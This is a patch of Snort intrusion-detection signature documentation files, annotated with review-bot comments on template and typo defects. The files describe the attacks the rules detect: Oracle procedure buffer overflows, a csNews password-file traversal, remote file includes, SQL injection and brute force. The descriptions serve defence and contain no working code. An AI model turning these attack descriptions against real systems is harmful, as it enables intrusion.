+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
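Review bot: "False Positives: None known." is not credible for a rule whose Detailed Information says it fires on the bare string "girls gone wild" in network traffic; any e-mail, news article, search result or web page containing the phrase will trigger it, and the 558.txt file in this same patch documents exactly that kind of false positive for its own string match ("This rule detects the term "GNUTELLA OK" on all ports. As a result, any email, web page, or other network content ..."). The same wording should be used here. "Ease of Attack: Simple." is meaningless for a policy-violation rule; 558.txt uses "N/A" for this case. Also strip the leading space on " All systems."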
--- /dev/null
+++ b/doc/signatures/419.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+
+Sid:
+419
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Mobile Host Redirect datagram.
+
+--
+
+Impact:
+ICMP Mobile Host Redirect Messages alert base-stations to the movements of IP based mobile hosts, such as notebooks and palmtop computers.
+
+--
+
+Detailed Information:
+The Transparent Internet Routing for IP Mobile Hosts IETF draft defines ICMP Type 32 Code 0 as an ICMP Mobile Host Redirect Message.  This message was intended to be used by mobile computers to inform base-stations of their location on the network as they move from base-station to base-station.  
+
+This IETF draft was never ratified, and no hardware is known to exist that generates this type of ICMP datagram
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 32 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for nefarious activity
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
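Review bot: this file has no "Affected Systems:" section at all, while every other file in the patch has one; add it (even as "N/A" or "Any host generating ICMP Type 32 datagrams") so the format stays parseable. Missing terminal periods on "no hardware is known to exist that generates this type of ICMP datagram" and on "Hosts generating these types of datagrams should be investigated for nefarious activity", and the False Negatives "None known" is not followed by the blank line used before "--" elsewhere in this file. The Contributors entry uses "(matt.watchinski@sourcefire.com)" where the other files use angle brackets.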
--- /dev/null
+++ b/doc/signatures/2798.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2798
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure register_statistics
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
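Review bot: the sentence naming the vulnerable procedure is broken across lines before its period ("vulnerability in the procedure register_statistics" / ". This procedure is included in" / "dbms_repcat."), which reads as a formatting error; join it into one sentence. The package should also be named consistently with the sibling Oracle files in this patch, which use the schema-qualified form ("sys.dbms_repcat_mas", "sys.dbms_repcat_conf"), so "sys.dbms_repcat" here. "Oracle Oracle9i" in Affected Systems duplicates the vendor name, several "-- " separators carry trailing whitespace, and "Apply the appropriate vendor supplied patch" is the whole Corrective Action while Additional References is empty; the vendor advisory the patch comes from belongs there.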
--- /dev/null
+++ b/doc/signatures/2829.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2829
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_repobject
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
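Review bot: same template defects as 2798.txt in this patch: the procedure name line is split before its period ("comment_on_repobject" / ". This procedure is included in"), "Oracle Oracle9i" duplicates the vendor name, separators carry trailing whitespace, and Additional References is empty although Corrective Action tells the reader to "Apply the appropriate vendor supplied patch". Fix them in the shared template once rather than per file.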
--- /dev/null
+++ b/doc/signatures/2223.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+2223
+
+--
+Summary:
+This event is generated when an attempt is made to access csNews.cgi on an internal web server. This may indicate an attempt to exploit a file disclosure vulnerability in csNews.cgi, a script distributed by CGIScript.NET.
+
+--
+Impact:
+Information disclosure. The attacker must have an authenticated account to successfully execute this exploit.
+
+--
+Detailed Information:
+csNews.cgi is a Perl script that manages web-based news items, and contains a vulnerability in its ability to decode and filter out double-decoded URL data on the Advanced Settings page. An authenticated attacker can insert double-decoded directory traversals and file names into the header or footer parameters in csNews.cgi, and the files will appear in the header or footer of the page. 
+
+--
+Affected Systems:
+Systems running CGISCRIPT.NET csNews 1.0 or CGISCRIPT.NET csNews Professional 1.0
+
+--
+Attack Scenarios:
+An attacker crafts a URL with /../../passwd double-encoded in the header or footer parameter. If the password file exists in that location, the file will appear in the header or footer of the web page.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses csNews.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been patched or fixed in later versions. Contact the vendor for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+
+--
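Review bot: the vendor is spelled "CGIScript.NET" in the Summary and "CGISCRIPT.NET" in Affected Systems; use one form. Corrective Action ("It is not known if this vulnerability has been patched or fixed in later versions. Contact the vendor for more information.") leaves the reader without a lead, and Additional References is empty; the advisory that documents the double-decoded traversal in the header and footer parameters should be listed so an analyst can verify the version they are running. Since Impact states the attacker "must have an authenticated account", it would also help to say so in the Attack Scenarios sentence, which currently reads as if any visitor could do it.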
--- /dev/null
+++ b/doc/signatures/1939.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1939
+
+--
+Summary:
+This event is generated when a possible buffer overflow is attempted for the bootpd service.
+
+--
+Impact:
+Remote access. This attack may permit the execution of arbitrary commands on the vulnerable server.
+
+--
+Detailed Information:
+Bootp is a protocol used for devices such as diskless workstations to locate a host from which to boot and to receive an assigned an IP address.  A flaw exists in the bootpd service allowing a possible buffer overflow condition when a bootp request is issued with an invalid hardware address type. This attack may permit the execution of arbitrary commands on the vulnerable server. 
+
+--
+Affected Systems:
+OpenBSD 2.3, 2.4
+FreeBSD - Releases up to and including 2.x
+
+--
+Attack Scenarios:
+An attacker may attempt to use this exploit to gain remote access on the vulnerable server.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block bootp traffic from entering your network.  
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0798
+
+--
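Review bot: "to receive an assigned an IP address" in Detailed Information has a doubled article; "to receive an assigned IP address". The Corrective Action "Block bootp traffic from entering your network." should be qualified as blocking it from external sources at the perimeter, the way 2478.txt in this patch phrases its filtering advice, because diskless clients on the local segment depend on bootp and a blanket block breaks them. The Affected Systems line "FreeBSD - Releases up to and including 2.x" should follow the same "vendor version" layout as the OpenBSD line above it.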
--- /dev/null
+++ b/doc/signatures/645.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 645
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing Sparc Solaris/SunOS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS353
+
+--
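Review bot: "Sid: 645" puts the number on the header line, whereas every other file in this patch puts it on its own line; keep the format uniform so the files can be parsed the same way. The False Positives text "legitimate traffic to the specified port" refers to a port that is never specified anywhere in this file; either name the port(s) the rule watches or drop the phrase. There is no "Affected Systems:" section even though Detailed Information names "Sparc Solaris/SunOS network services"; add one. Typos: "Unkown" in Contributors, a double space in "execute  attacker-controlled", and the comma in "application-dependent however, a platform-specific" belongs before "however".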
--- /dev/null
+++ b/doc/signatures/2274.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2274
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to an
+POP3 server using brute force methods.
+
+--
+Impact:
+Attempted remote access.  
+This event may indicate that an attacker is attempting to guess username and password combinations.  
+Alternately, it may indicate that an authorized user has entered an
+incorrect username and password combination a number of times.
+
+--
+Detailed Information:
+An POP3 server will issue an error message after a failed login attempt.  
+This may be an indication of an attacker attempting brute force guessing 
+of username and password combinations.  It is also possible that an authorized 
+user has incorrectly entered a legitimate username and password combination.  
+
+This event will be generated after a number of failed attempts.
+
+--
+Affected Systems:
+POP3 servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to guess username and password combinations.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This event may be triggered by a failed POP3 login attempt from a remote user.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
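Review bot: the Corrective Action section is empty; for a brute-force rule the reader needs at least the usual guidance (check whether the source is an authorized user mistyping credentials, enforce strong passwords and account lockout or rate limiting on the POP3 server, and block the source if the attempts continue). "This event will be generated after a number of failed attempts." should state the threshold and time window the rule actually uses, because operators tune the rule against that number. Grammar: "an POP3 server" appears twice (Summary and Detailed Information) and should be "a POP3 server".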
--- /dev/null
+++ b/doc/signatures/2875.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2875
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
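Review bot: same template defects as 2798.txt in this patch: "alter_priority" is split from its sentence's period across lines, "Oracle Oracle9i" duplicates the vendor name, separators carry trailing whitespace, and Additional References is empty while Corrective Action points the reader to a vendor patch it never names.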
--- /dev/null
+++ b/doc/signatures/100000347.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000347
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ezupload Pro" application running on a webserver. Access to the file "form.php" using a remote file being passed as the "path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "path" parameter in the "form.php" script used by the "Ezupload Pro" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ezupload Pro
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
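Review bot: the third Detailed Information paragraph and the first Attack Scenarios sentence ("An attacker can access an authentication mechanism and supply his/her own credentials to gain access.") are the credential-validation boilerplate from the authentication template and do not describe a remote file include via the "path" parameter of "form.php"; replace them with text about the included file being executed by the web server. Typos: "running ona web server", "attackers choosing" (attacker's), and the redundant "an exploitation attempt has been attempted". The file also opens with two blank lines before "Rule:", unlike most files in this patch.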
--- /dev/null
+++ b/doc/signatures/558.txt
@@ -0,0 +1,90 @@
+Rule:  
+
+--
+
+Sid:
+
+558
+
+--
+
+Summary:
+
+A network-external server has authenticated an internal GNUTella client
+connection attempt and they have begun communications.
+
+--
+
+Impact:
+
+Possible policy violation.
+
+--
+
+Detailed Information:
+
+GNUTella is a P2P (Peer-to-Peer) protocol for exchanging arbitrary
+files.  Depending on your site's policies, using it may be a policy
+violation.
+
+If not properly configured, GNUTella clients may accidentally share out
+confidential files.  GNUTella worms (which use deceptive names to
+encourage download) and viruses may also be accidentally downloaded by a
+client.
+
+This rule being triggered means that a GNUTella client has been detected
+on the protected network.
+
+--
+
+Affected Systems:
+
+Any system with a GNUTella client installed (available for most
+platforms)
+
+--
+
+Attack Scenarios:
+
+N/A
+
+--
+
+Ease of Attack:
+
+N/A
+
+--
+
+False Positives:
+
+This rule detects the term "GNUTELLA OK" on all ports.  As a result, any
+email, web page, or other network content that discusses the protocol
+and its messages will trigger this alert.
+
+--
+
+False Negatives:
+
+None known.
+
+--
+
+Corrective Action:
+
+Depends on acceptable use policies.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Gene R Gomez (gene!AT!gomezbrothers!DOT!com)
+
+-- 
+
+Additional References:
+
+GNUTella
+http://www.gnutella.com
+
+--
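Review bot: "A network-external server has authenticated an internal GNUTella client connection attempt" overstates what the rule shows; the False Positives section says the rule only matches the handshake string "GNUTELLA OK", which indicates the connection was accepted, not that any authentication took place, so "accepted" is the accurate verb. Minor style: the Contributors header is the only section in this file not followed by a blank line.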
--- /dev/null
+++ b/doc/signatures/100000345.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000345
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SocketMail" application running on a webserver. Access to the file "inc-common.php" using a remote file being passed as the "site_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "site_path" parameter in the "inc-common.php" script used by the "SocketMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SocketMail
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
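Review bot: as with the other remote file include files in this patch (100000347.txt, 100000614.txt), the third Detailed Information paragraph and the first Attack Scenarios sentence are authentication boilerplate that does not fit an include via the "site_path" parameter of "inc-common.php"; replace them with text about the remotely fetched file being executed. Typos: "running ona web server", "attackers choosing", "an exploitation attempt has been attempted", and the two leading blank lines before "Rule:".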
--- /dev/null
+++ b/doc/signatures/100000614.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000614
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_premium_listing.php" using a remote file being passed 
+as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_premium_listing.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
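Review bot: the third Detailed Information paragraph and the first Attack Scenarios sentence are the credential-validation boilerplate and do not describe a remote file include via "admin_template_path" in "link_premium_listing.php"; drop or replace them. The separator "--" after Sid, after "All systems running CGI applications using Indexu" and after the Contributors list is missing the blank line used before it elsewhere, and the typos "running ona web server", "attackers choosing" and "an exploitation attempt has been attempted" recur here.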
--- /dev/null
+++ b/doc/signatures/924.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+924
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
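Review bot: the "Affected Systems:" section is empty; since the Summary describes a generic authentication weakness in "a web server or an application running on that server", the section should at least say "Any web server or web application with an authentication mechanism" so a reader does not take the blank for a parsing error. "running ona web server" in Detailed Information should be "on a web server".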
--- /dev/null
+++ b/doc/signatures/100000511.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000511
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "message.php" with SQL commands being passed as the "UserID" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "UserID" parameter in the "message.php" script used by 
+the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
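Review bot: as in 100000775.txt, the third Detailed Information paragraph is credential-validation boilerplate that does not describe SQL injection via the "UserID" parameter of "message.php"; drop it. The second paragraph is a comma splice ("... compromise the database backend for the application, the attacker may also be able ..."), the separators after Sid, Affected Systems and Contributors lack the blank line used before them elsewhere, and "attackers choosing", "running ona web server" and "an exploitation attempt has been attempted" need the same fixes as the other files.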
--- /dev/null
+++ b/doc/signatures/3457.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+3457
+
+--
+Summary:
+This event is generated when an attempt is made to exploit
+a buffer overflow associated with the Arkeia Client Backup
+server.
+
+--
+Impact:
+A successful attack may cause a buffer overflow and the
+subsequent execution of arbitrary code at the privilege
+level of the vulnerable service.
+
+--
+Detailed Information:
+A vulnerability exists in the Arkeia Client Backup server
+software for a type 77 request. This may cause a buffer
+overflow and the subsequent execution of arbitrary code
+on a vulnerable server. The vulnerability is caused by
+an overly long message length.
+
+--
+Affected Systems:
+	Arkeia version 5.3 and prior.
+
+--
+Attack Scenarios:
+An attacker craft a malicious type 77 request and send
+it to a vulnerable server.
+
+--
+Ease of Attack:
+Simple.  Exploits are publicly available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+There can be multiple messages in one transfer. The event is generated
+on the first message only.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Metasploit:
+http://metasploit.com/research/arkeia_agent
+
+--
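Review bot: "An attacker craft a malicious type 77 request and send it" should read "crafts ... and sends it"; "Additional References" is missing the trailing colon that every other section header has. The False Negatives note that only the first message of a transfer is inspected is useful operational detail and should stay; the Affected Systems line is indented with a tab while most files in this patch do not indent it.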
--- /dev/null
+++ b/doc/signatures/2869.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2869
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_char
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
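Review bot: the procedure name in Detailed Information is split across a line break with a stray period on its own line ("vulnerability in the procedure alter_priority_char" / "."), which reads as a broken sentence; join it as "...in the procedure alter_priority_char. This procedure is included in sys.dbms_repcat_conf." Affected Systems reads "Oracle Oracle9i" (vendor name duplicated), and Additional References is empty even though Detailed Information cites multiple overflow conditions; the vendor alert covering these dbms_repcat overflows should be linked.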
--- /dev/null
+++ b/doc/signatures/2478.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2478
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the winreg
+service.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to bind to the RPC
+service for winreg.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
